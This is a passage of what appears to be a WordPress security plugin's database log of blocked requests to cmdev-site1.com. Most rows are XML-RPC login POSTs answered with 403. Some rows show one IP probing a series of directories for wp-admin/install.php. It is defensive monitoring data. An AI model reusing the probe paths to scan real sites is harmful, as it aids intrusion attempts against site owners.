Safari\\/537.36\"}','rYexv0gEsbqaf1K2CD8FnkZc',0,1681235388.9651,3620,'','POST',403,0,515,0,1,'',0),('213.152.186.173',3583556269,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','v1FAblGPVReQoETsHjM7XwUN',0,1681236376.8551,3958,'','POST',403,0,515,0,1,'',0),('198.251.70.49',3338356273,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','c0DI7wnAzvb3QBL1VOjZFmp5',0,1681236650.8030,3446,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','01HilXTydAfwjnos9uxptJBU',0,1681236653.1542,1492,'','POST',403,0,515,0,1,'',0),('35.240.237.113',602991985,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','nfJG9MrYVItlxhcjETSsF2vP',0,1681236659.2859,573,'','POST',403,0,515,0,1,'',0),('116.118.51.5',1953903365,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','e104LQTjWiDJcS3xoHG5kpR6',0,1681236661.0629,565,'','POST',403,0,515,0,1,'',0),('199.16.128.41',3339747369,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','xWQ7IE1UpFah4VOfzrqwYN3X',0,1681236670.8831,596,'','POST',403,0,515,0,1,'',0),('198.251.70.49',3338356273,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','vq0Ys4EfzjD8yTrgQ37LpNbV',0,1681236674.3760,1395,'','POST',403,0,515,0,1,'',0),('172.104.50.233',2892509929,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','R6vuS8dKBPVmwHQhLFja1qXs',0,1681236674.9642,1604,'','POST',403,0,515,0,1,'',0),('172.104.50.233',2892509929,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','CZYExfU2aqDV0hmTg13NA7Xb',0,1681236675.1561,1579,'','POST',403,0,515,0,1,'',0),('198.251.70.49',3338356273,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','PlZuwBaJbjWxNVHFYAvq08Lz',0,1681236684.9078,418,'','POST',404,0,515,0,1,'',0),('176.119.210.163',2960642723,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','2PzFKXvZLOBx1hCU7o5beRl8',0,1681236685.7975,570,'','POST',403,0,515,0,1,'',0),('185.9.19.107',3104379755,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','oJpHK524EghlXGQPBWA7FNmv',0,1681236943.0232,3719,'','POST',403,0,515,0,1,'',0),('104.254.90.251',1761499899,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','kEvLwOjl7J6CISyafbsropqF',0,1681237075.7932,573,'','POST',403,0,515,0,1,'',0),('146.70.94.3',2454085123,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','9CxBc0zeH61SgsLKP7TOjo8f',0,1681237890.0851,716,'','POST',403,0,515,0,1,'',0),('64.42.179.67',1076540227,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','3OD6RXSUQFKftJewkMcno5vI',0,1681238115.5127,3796,'','POST',403,0,515,0,1,'',0),('144.24.100.136',2417517704,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Jd4v76EiK3s5YPFUCWntuNxZ',0,1681244045.6708,597,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','olH9BftDmRaUwsTEjINehAv4',0,1681244052.9353,587,'','POST',403,0,515,0,1,'',0),('212.53.128.157',3560276125,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','OP7pBGbfjmIA5WrNFYKE49x3',0,1681244494.1744,693,'','POST',403,0,515,0,1,'',0),('192.99.35.126',3227722622,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','LFvWHGwR6IONpUQS1CTjX0z5',0,1681244502.5377,576,'','POST',403,0,515,0,1,'',0),('160.153.153.159',2694420895,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','mBYt6NOdKU5Zz43Qis0c2wfq',0,1681244509.7122,580,'','POST',403,0,515,0,1,'',0),('160.153.153.159',2694420895,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','57Ua3AinxqGsvEk2Pz9HyRBu',0,1681244513.2898,1388,'','POST',403,0,515,0,1,'',0),('188.132.193.93',3162816861,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','2wGAle3tN7Eq84QZfSc6Jgvn',0,1681244513.5882,1301,'','POST',403,0,515,0,1,'',0),('68.178.224.4',1152573444,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','uCHrwipejaA7QDfdOFnLTstm',0,1681244520.8347,585,'','POST',403,0,515,0,1,'',0),('207.154.253.117',3483041141,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','dSVtJInxw8T7W9FQzYBLhPAG',0,1681244522.2641,609,'','POST',403,0,515,0,1,'',0),('103.9.227.178',1728701362,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','FBvKDcTVA3n0sogWdQEXmkza',0,1681244531.3629,552,'','POST',403,0,515,0,1,'',0),('194.38.23.179',3257276339,'','http://cmdev-site1.com/admin/assets/plugins/plupload/examples/upload.php','','{\"1\":\"ALittle Client\"}','shMCigVTlqyxkOeHXFD8zdnu',0,1681245488.3164,333,'','GET',403,0,700,0,1,'',0),('62.102.148.154',1046910106,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','IxYwe6HjCzgqGt3XvU2kPyiL',0,1681245996.3299,1625,'','POST',403,0,515,0,1,'',0),('160.153.153.159',2694420895,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','4m0p6UBhqN7QSnReKcHlE9rL',0,1681247211.7554,398,'','POST',404,0,515,0,1,'',0),('162.215.217.77',2732054861,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','ynXTtr8hlZwW7FBab4kL2eKc',0,1681247215.2068,566,'','POST',403,0,515,0,1,'',0),('95.0.0.250',1593835770,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','bwU5uafiMHVs9cvrZRPNKYqC',0,1681247219.0456,566,'','POST',403,0,515,0,1,'',0),('184.168.98.87',3098042967,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','ezhHgQvoFSkEyZO71NiUJnuT',0,1681247226.0643,592,'','POST',403,0,515,0,1,'',0),('209.126.6.155',3514697371,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','shoCLx4IN5M2S1TPU0qtiayX',0,1681248495.0831,666,'','POST',403,0,515,0,1,'',0),('210.1.51.166',3523294118,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','qeWXMiKHRxPpst3C6r7mknvu',0,1681248497.2428,560,'','POST',403,0,515,0,1,'',0),('193.123.87.139',3246086027,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','q9cuWdtralHN8fbps4wOPx6Y',0,1681248502.6415,611,'','POST',403,0,515,0,1,'',0),('66.248.237.41',1123609897,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gfbnSy1Bk5VcRx9sMHG3ihpW',0,1681248515.0887,800,'','POST',403,0,515,0,1,'',0),('23.235.195.123',401326971,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','agT3czhJOxFBuyKoVn9SEl51',0,1681248529.1468,10220,'','POST',403,0,515,0,1,'',0),('68.178.145.141',1152553357,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','7OpVW8jU2t0ayPscvGIF9RJM',0,1681248529.6411,10204,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','M2JmBzrSwh7G6YnvtLRkgidx',0,1681249204.7621,788,'','POST',403,0,515,0,1,'',0),('210.116.66.47',3530834479,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','qRvIecrS6FB95onz8Y0CuHGt',0,1681249206.3249,594,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','QoEjZmkTG0vlHJuLUxiNCBga',0,1681252446.7237,580,'','POST',403,0,515,0,1,'',0),('8.140.29.143',143400335,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','LGpQvRdlsWk4Z9gyXzaUSxNr',0,1681252447.6395,626,'','POST',403,0,515,0,1,'',0),('103.178.57.232',1739733480,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','hbHa7SDmM5Uk1GNtIzcluWCE',0,1681252449.9218,621,'','POST',403,0,515,0,1,'',0),('190.104.235.180',3194547124,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','CKdy0qLzIi1tAvRjH7woWMgS',0,1681252453.6575,1228,'','POST',403,0,515,0,1,'',0),('146.88.234.56',2455300664,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','V3T1ZWoRPQSr0i7AEN2XzJ9v',0,1681252453.6567,1363,'','POST',403,0,515,0,1,'',0),('45.195.56.33',767768609,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','ekwzE3S2NLp40Fy9ZBJCjMrv',0,1681252458.4762,570,'','POST',403,0,515,0,1,'',0),('54.37.121.239',908425711,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','Cj7KHfF9VIkNazLZXnp1uTRv',0,1681255412.0158,723,'','POST',403,0,515,0,1,'',0),('34.231.174.129',585608833,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','AyB91qfm5CphWLFK6UQG0Nrw',0,1681255414.0529,607,'','POST',403,0,515,0,1,'',0),('199.16.128.41',3339747369,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','WArKPw63V0OgDNEtcn9uMB1Z',0,1681255420.3813,670,'','POST',403,0,515,0,1,'',0),('67.225.141.165',1138855333,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','np7gJeHU6DNATXPkObVBjZwf',0,1681255423.7330,596,'','POST',403,0,515,0,1,'',0),('54.36.172.75',908373067,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','4X2YB9vQzrT8eiOuclUSsDJa',0,1681255427.5273,572,'','POST',403,0,515,0,1,'',0),('91.204.46.124',1540107900,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','t2VYeaUzMIb0hklsi1nJELj6',0,1681255428.3577,566,'','POST',403,0,515,0,1,'',0),('91.204.46.124',1540107900,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','W40hpc8qLGJ9KBOv7XxzFfMg',0,1681255431.1389,553,'','POST',403,0,515,0,1,'',0),('81.223.232.24',1373628440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Rr8GeN1QauMzwdK60F4kmfTB',0,1681255438.6611,562,'','POST',403,0,515,0,1,'',0),('5.188.34.69',96215621,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','3WJM5C9bVTX0s4YStI6xhaUH',0,1681255442.2676,1219,'','POST',403,0,515,0,1,'',0),('34.231.174.129',585608833,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','0YmGdlxMgNBLZInepkTaUWXR',0,1681255442.6851,1117,'','POST',403,0,515,0,1,'',0),('142.44.211.18',2385302290,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','TuDnZroNWvpgswdRPxGQt4Mi',0,1681255445.7112,549,'','POST',403,0,515,0,1,'',0),('137.184.102.171',2310563499,'','http://cmdev-site1.com/wp/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','djVQ18WB27bZhIxK9DCSzLFt',0,1681256260.8679,716,'','GET',403,0,700,0,1,'',0),('137.184.102.171',2310563499,'','http://cmdev-site1.com/new/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','g9pceu42lfIYNTiqHJxt8nz7',0,1681256264.2813,302,'','GET',403,0,700,0,1,'',0),('137.184.102.171',2310563499,'','http://cmdev-site1.com/old/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','SE2ulzXx7dwmoPMZhisHJC3Q',0,1681256266.5078,287,'','GET',403,0,700,0,1,'',0),('137.184.102.171',2310563499,'','http://cmdev-site1.com/wordpress/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','Ljy6euEANcH2IqMliw4KCbYr',0,1681256267.7126,280,'','GET',403,0,700,0,1,'',0),('137.184.102.171',2310563499,'','http://cmdev-site1.com/test/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','zPVyLJi24KXg1d6A3Bul5O7H',0,1681256268.8199,273,'','GET',403,0,700,0,1,'',0),('137.184.102.171',2310563499,'','http://cmdev-site1.com/blog/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','Y3zLdapZPbMvIrnelhjO0JXk',0,1681256269.8758,305,'','GET',403,0,700,0,1,'',0),('137.184.102.171',2310563499,'','http://cmdev-site1.com/cms/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','xJ1NkXsZdVnLqf6iBU9WhgSl',0,1681256271.7017,282,'','GET',403,0,700,0,1,'',0),('137.184.102.171',2310563499,'','http://cmdev-site1.com/web/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','bAPjHBGmkI0KuyiXCvZRzMf8',0,1681256273.1872,285,'','GET',403,0,700,0,1,'',0),('137.184.102.171',2310563499,'','http://cmdev-site1.com/backup/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','jtlvfbmcGar0hMDC2V4YyAIx',0,1681256279.6526,1381,'','GET',403,0,700,0,1,'',0),('137.184.102.171',2310563499,'','http://cmdev-site1.com/site/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','gl1tYsMO2h8wWz6rNRAmP9y0',0,1681256283.3161,765,'','GET',403,0,700,0,1,'',0),('137.184.102.171',2310563499,'','http://cmdev-site1.com/oldsite/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','b18HQIWjUCTMZaoyn9lwxKgz',0,1681256286.9434,294,'','GET',403,0,700,0,1,'',0),('148.66.147.20',2487390996,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','JHS3BaGrLi1luE7YcxXMqDjO',0,1681256674.7771,2801,'','POST',403,0,515,0,1,'',0),('82.165.83.178',1386566578,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','kz8MEj1SoupZUGHaJRsvWKlF',0,1681256677.7462,566,'','POST',403,0,515,0,1,'',0),('45.195.25.73',767760713,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','qr40WhHINwBQJEfaMmX5U2ki',0,1681256681.2584,564,'','POST',403,0,515,0,1,'',0),('157.90.169.39',2639964455,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','VghkfBzmq0DyraSw1iGjdItn',0,1681256686.7976,561,'','POST',403,0,515,0,1,'',0),('212.90.148.14',3562705934,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','r98GIpRtNVf21LsHvUolugYd',0,1681256692.4624,1416,'','POST',403,0,515,0,1,'',0),('207.154.253.117',3483041141,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','0ZJdsmlv6fyNt8XDe9zIOCcL',0,1681256697.5644,1089,'','POST',403,0,515,0,1,'',0),('5.79.102.66',89089602,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','19UVXeW8czl5MuPbv3jKEi4O',0,1681256697.9828,992,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','OXUwRdtzpSuFIfg9chGaDlWe',0,1681256721.2788,645,'','POST',403,0,515,0,1,'',0),('198.50.254.114',3325230706,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','MuhCxAqfvksoQ07y5EFZ6giP',0,1681259356.3148,623,'','POST',403,0,515,0,1,'',0),('79.170.43.200',1336552392,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','GSYmKu203QvhBNfiDInA6g5U',0,1681259360.4347,568,'','POST',403,0,515,0,1,'',0),('180.235.151.165',3035338661,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','EK6HNW32ClDyjBoqm7xOUwaS',0,1681259371.0063,702,'','POST',403,0,515,0,1,'',0),('8.210.238.120',148041336,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','PWC4SKuvXoL7Brgf3IVzehxG',0,1681259372.5041,613,'','POST',403,0,515,0,1,'',0),('212.90.148.14',3562705934,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','C4edtFfs79NlHW6o1MqXT5AB',0,1681259374.4279,585,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows 